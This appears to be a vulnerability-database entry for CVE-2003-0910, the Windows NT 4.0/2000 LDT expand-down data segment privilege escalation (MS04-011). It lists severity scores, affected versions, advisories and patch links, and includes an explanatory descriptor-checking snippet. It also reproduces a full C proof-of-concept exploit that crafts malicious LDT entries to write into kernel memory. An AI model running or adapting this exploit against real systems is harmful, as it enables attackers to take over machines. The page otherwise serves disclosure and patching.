CVE-2003-0910
CVSS 7.2
Published: 2004-06-01 00:00:00
Modified: 2008-09-10 15:20:55
NMCOES

[Original] The NtSetLdtEntries function in the programming interface for the Local Descriptor Table (LDT) in Windows NT 4.0 and Windows 2000 allows local attackers to gain access to kernel memory and execute arbitrary code via an expand-down data segment descriptor that points to protected memory.


[CNNVD] Windows Expand-Down Data Segment Local Privilege Escalation Vulnerability (MS04-011) (CNNVD-200406-011)

        
        Windows is the desktop operating system developed by Microsoft.
        The NtSetLdtEntries API function in the Windows kernel lacks sufficient validation checks; a local attacker can exploit this vulnerability to escalate privileges.
        The problem stems from two separate but related flaws in the kernel. The first is that the NtSetLdtEntries API function lacks sufficient validation, so its security checks can be bypassed and a dangerous data segment can be created. The second is that some kernel code lacks filtering: when user code passes it a reference to such a malicious segment (created with NtSetLdtEntries), arbitrary memory addresses can be modified.
        An attacker logged on to the system locally can create a malicious LDT entry that reaches protected memory, escalate privileges, and take control of the entire system.
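
The second flaw above comes down to a bound check that looked at a descriptor's base and limit but not at its expand-down bit, which inverts the range of valid offsets. The following added example (not code from the page or from Microsoft) decodes a descriptor from the two dwords NtSetLdtEntries receives and contrasts that naive bound with one that honours the bit; encode_descriptor, decode_descriptor and descriptor_accepted are hypothetical helpers, and the 0x80000000 kernel boundary (the classic 2 GB/2 GB split) is an assumption.

```c
#include <stdint.h>
#include <stdbool.h>
/* Assumption: classic NT 2 GB/2 GB split, kernel space begins at 0x80000000. */
#define KERNEL_BASE 0x80000000ull

typedef struct {
    uint32_t base, limit;   /* linear base; limit after granularity scaling */
    bool data, expand_down; /* S=1 data segment; its E (expand-down) bit */
    bool big;               /* D/B bit: 32-bit offsets */
} segdesc_t;
/* Pack the fields the way the PoC's SetupLDT fills an LDT_ENTRY
 * (type5 = S bit plus the 4-bit type; the P bit is always set). */
void encode_descriptor(uint32_t base, uint32_t raw_limit, unsigned type5, bool gran,
                       bool big, unsigned dpl, uint32_t *lo, uint32_t *hi)
{
    *lo = (raw_limit & 0xFFFFu) | ((base & 0xFFFFu) << 16);
    *hi = ((base >> 16) & 0xFFu) | ((type5 & 0x1Fu) << 8) | ((dpl & 3u) << 13) |
          (1u << 15) | (((raw_limit >> 16) & 0xFu) << 16) |
          ((uint32_t)big << 22) | ((uint32_t)gran << 23) | (base & 0xFF000000u);
}

/* Decode the two dwords exactly as NtSetLdtEntries receives them. */
segdesc_t decode_descriptor(uint32_t lo, uint32_t hi)
{
    segdesc_t d;
    uint32_t raw_limit = (lo & 0xFFFFu) | (((hi >> 16) & 0xFu) << 16);
    unsigned type = (hi >> 8) & 0xFu;
    d.base = (lo >> 16) | ((hi & 0xFFu) << 16) | (hi & 0xFF000000u);
    d.limit = ((hi >> 23) & 1u) ? ((raw_limit << 12) | 0xFFFu) : raw_limit;
    d.data = ((hi >> 12) & 1u) && !(type & 0x8u);
    d.expand_down = d.data && (type & 0x4u);
    d.big = (hi >> 22) & 1u;
    return d;
}

/* Highest reachable linear address must stay below KERNEL_BASE. honour_expand_down=false
 * is the naive base+limit bound; true treats an expand-down segment's valid offsets as
 * limit+1 .. 0xFFFFFFFF (0xFFFF when D/B=0). A sum that wraps past 2^32 fails as well. */
bool descriptor_accepted(uint32_t lo, uint32_t hi, bool honour_expand_down)
{
    segdesc_t d = decode_descriptor(lo, hi);
    uint64_t top = d.limit;
    if (!d.data) return false;                  /* system and code descriptors: reject */
    if (honour_expand_down && d.expand_down) {
        top = d.big ? 0xFFFFFFFFull : 0xFFFFull;
        if ((uint64_t)d.limit + 1 > top) return true;  /* empty segment addresses nothing */
    }
    return (uint64_t)d.base + top < KERNEL_BASE;
}
```

With the PoC's field values (Type 23, G=1, D/B=1, limit 0) the naive bound sees base+0xFFF and accepts, while the expand-down-aware bound sees base+0xFFFFFFFF and rejects.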
        

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure, all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

cpe:/o:microsoft:windows_2000  Microsoft Windows 2000
cpe:/o:microsoft:windows_nt:4.0  Microsoft Windows NT 4.0

- OVAL (technical details for detection)

oval:org.mitre.oval:def:911  Windows NT Local Descriptor Table Kernel Access Vulnerability
oval:org.mitre.oval:def:890  Windows 2000 Local Descriptor Table Kernel Access Vulnerability
*OVAL describes the method for detecting this vulnerability in detail; see the corresponding OVAL definitions for more technical details on detecting it.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0910
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0910
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200406-011
(official data source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/122076
(VENDOR_ADVISORY)  CERT-VN  VU#122076
http://www.us-cert.gov/cas/techalerts/TA04-104A.html
(VENDOR_ADVISORY)  CERT  TA04-104A
http://www.eeye.com/html/Research/Advisories/AD20040413D.html
(VENDOR_ADVISORY)  EEYE  AD20040413D
http://www.microsoft.com/technet/security/bulletin/ms04-011.asp
(UNKNOWN)  MS  MS04-011
http://lists.grok.org.uk/pipermail/full-disclosure/2004-April/020068.html
(UNKNOWN)  FULLDISC  20040413 EEYE: Windows Expand-Down Data Segment Local Privilege Escalation
http://xforce.iss.net/xforce/xfdb/15707
(UNKNOWN)  XF  win-ldt-gain-privileges(15707)
http://www.securityfocus.com/bid/10122
(UNKNOWN)  BID  10122
http://www.ciac.org/ciac/bulletins/o-114.shtml
(UNKNOWN)  CIAC  O-114

- Vulnerability information

Windows Expand-Down Data Segment Local Privilege Escalation Vulnerability (MS04-011)
High  Access validation error
2004-06-01 00:00:00 2005-10-20 00:00:00
Local
        

- Advisories and patches

        Vendor patches:
        Microsoft
        ---------
        Microsoft has released a security bulletin (MS04-011) and corresponding patches:
        MS04-011: Security Update for Microsoft Windows (835732)
        Link:
        http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx

        Patch downloads:
        Microsoft Windows NT Workstation 4.0 Service Pack 6a
        http://www.microsoft.com/downloads/details.aspx?FamilyId=7F1713FC-F95C-43E5-B825-3CF72C1A0A3E&displaylang=en

        Microsoft Windows NT Server 4.0 Service Pack 6a
        http://www.microsoft.com/downloads/details.aspx?FamilyId=67A6F461-D2FC-4AA0-957E-3B8DC44F9D79&displaylang=en

        Microsoft Windows NT Server 4.0 Terminal Server Edition Service Pack 6
        http://www.microsoft.com/downloads/details.aspx?FamilyId=62CBA527-A827-4777-8641-28092D3AAE4F&displaylang=en

        Microsoft Windows 2000 Service Pack 2, Microsoft Windows 2000 Service Pack 3, and Microsoft Windows 2000 Service Pack 4:
        http://www.microsoft.com/downloads/details.aspx?FamilyId=0692C27E-F63A-414C-B3EB-D2342FBB6C00&displaylang=en

- Vulnerability information (23989)

Microsoft Windows 2000/NT 4 Local Descriptor Table Local Privilege Escalation Vulnerability (EDBID:23989)
windows local
2004-04-18 Verified
0 mslug@safechina.net
N/A
source: http://www.securityfocus.com/bid/10122/info

Microsoft Windows Local Descriptor Table programming interface is prone to a privilege-escalation vulnerability.

A local attacker may be able to create a malicious entry in the Local Descriptor Table. This entry may point into protected memory. Since this memory space is reserved for kernel operations, the attacker will likely exploit this condition to execute arbitrary code with elevated privileges.

/******************************************************************
* Windows Expand-Down Data Segment Local Privilege Escalation
* [MS04-011]
*
* Bug found by: Derek Soeder
* Author: mslug (a1476854@hotmail.com), All rights reserved.
*
* Version: PoC 0.1
*
* Tested: Win2k pro en sp4
*
* Thanks: z0mbie's article :)
*
* Compile: cl winldt.c
*
* Date: 18 Apr 2004
*******************************************************************/


#include <windows.h>
#include <stdio.h>
#include <string.h>

#if 1
   #define KernelStackPtr 0xFD000000 //
   #define BedSize 0x01000000
#else
   #define KernelStackPtr 0xF0000000
   #define BedSize 0x10000000
#endif

unsigned char bed[BedSize];
unsigned char pin[]="COOL";

int (*NtSetLdtEntries)(DWORD, DWORD, DWORD, DWORD, DWORD, DWORD);

WORD SetupLDT(WORD seg, DWORD ldtbase);

unsigned long patch_to;

int main(int argc, char *argv[])
{
   DWORD ldtbase, KSP;
   int i;
   HMODULE hNtdll;
  
   if(argc<2) {
      printf("** coded by mslug@safechina.net **\n");
      printf("winldt.exe <kernel address>\n");
      return 0;
   }

   patch_to = strtoul(argv[1], 0, 16);
  
   hNtdll = LoadLibrary("ntdll.dll");
  
   (DWORD*)NtSetLdtEntries = (DWORD*)GetProcAddress(hNtdll, "NtSetLdtEntries");
  
   memset(bed, 'A', BedSize);
   bed[BedSize-1]=0;
  
   ldtbase = (DWORD) &bed[0] - KernelStackPtr;
  
   printf("[+] User-land bed : 0x%08X\n", &bed[0]);
   printf("[+] 1st LDT base : 0x%08X\n", ldtbase);

   SetupLDT(0x1f, ldtbase);
   __asm {
      push es
      push 1fh
      pop es
      mov eax, 11h //1 param
      lea edx, pin
      int 2eh
      pop es
   }

   for (KSP=0, i=0; i<BedSize-3; i++) {
      if (bed[i] =='C' && bed[i+1]=='O' &&
          bed[i+2]=='O' && bed[i+3]=='L' )
      {
         KSP = KernelStackPtr + i;
         printf("[!] Knl stack ptr : 0x%08X\n", KSP);
         //KSP = (DWORD)&bed[i]-ldtbase;
         //printf("[!] Knl stack ptr : 0x%08X\n", KSP);
         break;
      }
   }
  
   if(!KSP) {
      printf("[-] Can't locate Kernel stack pointer, try again\n");
      return 0;
   } else if (patch_to < KSP) {
      printf("[-] Can only patch kernel above KSP\n");
      return 0;
   }
  
   ldtbase = patch_to - KSP;

   printf("[+] Patch to : 0x%08X\n", patch_to);
   printf("[+] 2nd LDT base : 0x%08X\n", ldtbase);

   SetupLDT(0x17, ldtbase);
   __asm {
      push es
      push 17h
      pop es
      mov eax, 11h
      lea edx, pin
      int 2eh
      pop es
   }
  
   return 0;
}

WORD SetupLDT(WORD seg, DWORD ldtbase)
{
   LDT_ENTRY EvilLdt;
   DWORD base = ldtbase;
   DWORD limit = 0;
   int ret;
  
   EvilLdt.BaseLow = base & 0xFFFF;
   EvilLdt.HighWord.Bytes.BaseMid = base >> 16;
   EvilLdt.HighWord.Bytes.BaseHi = base >> 24;
   EvilLdt.LimitLow = (limit >> 12) & 0xFFFF;
   EvilLdt.HighWord.Bits.LimitHi = limit >> 28;
   EvilLdt.HighWord.Bits.Granularity = 1; // 0/1, if 1, limit=(limit<<12)|FFF
   EvilLdt.HighWord.Bits.Default_Big = 1; // 0=16bit 1=32bit
   EvilLdt.HighWord.Bits.Reserved_0 = 0; // 0/1
   EvilLdt.HighWord.Bits.Sys = 0; // 0/1
   EvilLdt.HighWord.Bits.Pres = 1; // 0/1 (presence bit)
   EvilLdt.HighWord.Bits.Dpl = 3; // only 3 allowed :-(
   EvilLdt.HighWord.Bits.Type = 23; // [16..27]

   ret = NtSetLdtEntries( seg,
                    *(DWORD*)&EvilLdt,
                    *(((DWORD*)&EvilLdt)+1),
                    0,0,0);
   if (ret < 0) {
      printf("[-] Set ldt error : %08X.\n", ret);
      exit(0);
   }

   return seg;
}

- Vulnerability information

5257
Microsoft Windows Local Descriptor Table Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity
Exploit Unknown Vendor Verified

- Vulnerability description

Windows contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when the NtSetLdtEntries API function fails to validate user-supplied input, which can then be passed to kernel code which also fails to validate the input. This flaw may allow an attacker to execute arbitrary code in kernel space, and lead to a loss of integrity.

- Timeline

2004-04-13 Unknown
Unknown 2004-04-13

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- References

- Vulnerability author

- Vulnerability information

Microsoft Windows Local Descriptor Table Local Privilege Escalation Vulnerability
Access Validation Error 10122
No Yes
2004-04-13 12:00:00 2007-10-02 05:49:00
Discovery of this vulnerability has been credited to eEye Digital Security.

- Affected program versions

Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows NT Terminal Server 4.0 SP5
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP6a
+ Avaya DefinityOne Media Servers
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
+ Avaya S8100 Media Servers 0
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows NT Enterprise Server 4.0 SP6a
Microsoft Windows NT Enterprise Server 4.0 SP6
Microsoft Windows NT Enterprise Server 4.0 SP5
Microsoft Windows NT Enterprise Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Avaya S8100 Media Servers 0
+ Microsoft Windows 2000 Server
+ Microsoft Windows NT Server 4.0 SP6a
Avaya S3400 Message Application Server 0
+ Microsoft Windows 2000 Server
Avaya IP600 Media Servers
Avaya DefinityOne Media Servers

- Exploit

The following proof of concept was supplied:

- Solution

Microsoft has released a security bulletin and fixes to address this issue. Please see the referenced advisories for details.


Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows NT Server 4.0 SP6a
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Server SP3
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows NT Enterprise Server 4.0 SP6a
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Professional SP4

- References
